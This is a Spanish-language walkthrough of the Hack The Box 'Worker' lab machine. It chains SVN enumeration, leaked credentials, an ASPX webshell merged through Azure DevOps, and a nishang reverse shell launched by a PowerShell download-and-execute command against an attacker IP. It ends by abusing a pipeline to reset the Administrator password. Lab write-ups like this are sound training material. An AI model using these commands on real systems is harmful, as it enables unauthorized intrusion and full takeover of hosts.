# Worker

**OS**: Windows \
**Dificultad**: Medio \
**Puntos**: 30

## Resumen

- SVN Server
- Azure DevOps
- Azure DevOps Pipelines

## Nmap Scan

`nmap -sV -sC -Pn -p- 10.10.10.203`

```
Nmap scan report for 10.10.10.203
Host is up (0.064s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open  svnserve Subversion
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

## Enumeración

A través del puerto 80 abierto solo se puede visualizar la página por default de Microsoft IIS, utilizando herramientas de descubrimiento de directorios no se logró obtener nada relevante.

Podemos ver que está el puerto **3690** abierto corriendo el servicio **svnserver**. Nos conectaremos al servicio con la herramienta **svn** para enumerar.

### SVN Server

> Apache Subversión (a menudo abreviado SVN, después de su nombre de comando svn) es un sistema de control de versiones y control de versiones de software distribuido como código abierto bajo la Licencia Apache. Los desarrolladores de software usan Subversión para mantener versiones actuales e históricas de archivos como código fuente, páginas web y documentación. Su objetivo es ser un sucesor en su mayoría compatible con el Sistema de Versiones Concurrentes (CVS) ampliamente utilizado.

Información sobre el repositorio, se puede ver que tiene 5 revisiones.

`svn info svn://10.10.10.203`

![1](img/1.png)

Listar archivos del repositorio.

`svn list svn://10.10.10.203`

![2](img/2.png)

Exportar el contenido del repositorio a nuestra máquina.

- `svn export svn://10.10.10.203/moved.txt`
- `svn export svn://10.10.10.203/dimension.worker.htb/`

![3](img/3.png)

En el archivo **moved.txt** podemos ver un nombre de subdominio y en la carpeta **dimension.worker.htb/** se encuentran archivos web.

![4](img/4.png)

Agregamos los subdominios a nuestro archivo **hosts**.

En el subdominio **dimension.worker.htb** se ve la página web que descargamos del repositorio y en el apartado work se encuentran más subdominios, los cuales agregamos a nuestro archivo **hosts**.

`http://dimension.worker.htb/`

![5](img/5.png)

![6](img/6.png)

##### /etc/hosts
```
10.10.10.203    worker.htb devops.worker.htb dimension.worker.htb alpha.worker.htb cartoon.worker.htb lens.worker.htb solid-state.worker.htb spectral.worker.htb story.worker.htb
```

En el subdominio **devops.worker.htb** nos pide usuario y password, los cuales no tenemos por el momento.

`http://devops.worker.htb/`

![7](img/7.png)

Enumerando un poco más el servicio svn, si recordamos el repositorio cuenta con 5 revisiones, haciendo un **checkout** para cambiar de revisión se visualiza un archivo llamado **deploy.ps1** el cual exportamos a nuestra máquina.

- `svn checkout -r 2 svn://10.10.10.203`
- `svn export svn://10.10.10.203/deploy.ps1`

![8](img/8.png)

El archivo deploy.ps1 contiene el password del usuario **nathen**.

![9](img/9.png)

```
nathen : wendel98
```

### Azure DevOps

> Azure DevOps representa la evolución de Visual Studio Team Services (VSTS). Nos ayuda a planificar de manera más inteligente nuestros proyectos, colaborar mejor y realizar entregas con un conjunto de servicios modernos para desarrolladores.

Utilizando las credenciales conseguidas podemos iniciar sesión en el subdominio **devops.worker.htb**.

![10](img/10.png)

Navegando en el proyecto **SmartHotel360** en al apartado **Repos/Branches** hay varias ramas que son de los subdominios encontrados anteriormente, después de probar crear archivos en cada rama, la única que refleja el contenido nuevo en la página web es **spectral**.

`http://devops.worker.htb/ekenas/SmartHotel360/_git/spectral`

![11](img/11.png)

Creamos una nueva rama.

![12](img/12.png)

En la nueva rama llamada **doomshell** creamos nuestra webshell.

![13](img/13.png)

Ponemos el contenido aspx extraído de **/usr/share/webshells/aspx/cmdasp.aspx** en el archivo **doom.aspx**.

![14](img/14.png)

Hacemos clic en **Commit**, seleccionamos los dos elemento en **Work items to link** y posteriormente **Create a pull request**.

![15](img/15.png)

![16](img/16.png)

Después seleccionaremos **Aprove** y seguido **Complete**.

![17](img/17.png)

Damos clic en **Complete Merge**.

![18](img/18.png)

![19](img/19.png)

Nos dirigimos al subdominio **spectral.worker.htb** para acceder a nuestra web shell.

`http://spectral.worker.htb/doom.aspx`

![20](img/20.png)

## Escalada de Privilegios (User)

Teniendo nuestra web shell ahora procedemos a obtener una reverse shell. Nos ayudaremos con los scripts de [nishang](https://github.com/samratashok/nishang).

- `cp ~/tools/Windows/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1`
- `echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.16 -Port 1234' >> shell.ps1`
- `sudo python3 -m http.server 80`
- `nc -lvnp 1234`

Desde la web shell.

`powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.15.16/shell.ps1')"`

![21](img/21.png)

Después de enumerar en la ruta **W:\svnrepos\www\conf** hay un archivo llamado **passwd** que contiene diferentes nombres de usuarios y passwords.

`type W:\svnrepos\www\conf\passwd`

![22](img/22.png)

El más relevante **robisl:wolves11**, ya que es el único que cuenta con una carpeta en **C:\Users**. Utilizando **evil-winrm** nos conectamos por el puerto **5985** con las credenciales.

`evil-winrm -i 10.10.10.203 -u robisl -p wolves11`

![23](img/23.png)

## Escalada de Privilegios (Root)

Con las nuevas credenciales obtenidas podemos acceder otra vez en **devops.worker.htb** y vemos un nuevo proyecto llamado **PartsUnlimited**.

![24](img/24.png)

Algo interesante es que con esta cuenta podemos crear **pipelines**, investigando un poco podemos hacer uso de pipeline para ejecutar comandos del sistema.

Nos vamos al apartado **pipelines** seguido de **New Pipeline** y Seleccionamos **Azure Repos Git**.

![25](img/25.png)

Después seleccionamos **Starter pipeline**.

![26](img/26.png)

Utilizaremos el siguiente script para cambiar el password del usuario Administrador.

##### azure-pipelines.yml
```yml
steps:
- script: net user Administrator Doom123456 
  displayName: 'Run a one-line script'
```

![27](img/27.png)

Damos clic en **Save and run**.

![28](img/28.png)

Esperamos a que termine el proceso.

![29](img/29.png)

Nos conectamos con evil-winrm.

`evil-winrm -i 10.10.10.203 -u Administrator -p Doom123456`

![30](img/30.png)

## Referencias
https://es.wikipedia.org/wiki/Subversion_(software) \
https://www.thegeekstuff.com/2011/04/svn-command-examples/ \
https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3 \
https://github.com/samratashok/nishang \
https://github.com/Hackplayers/evil-winrm
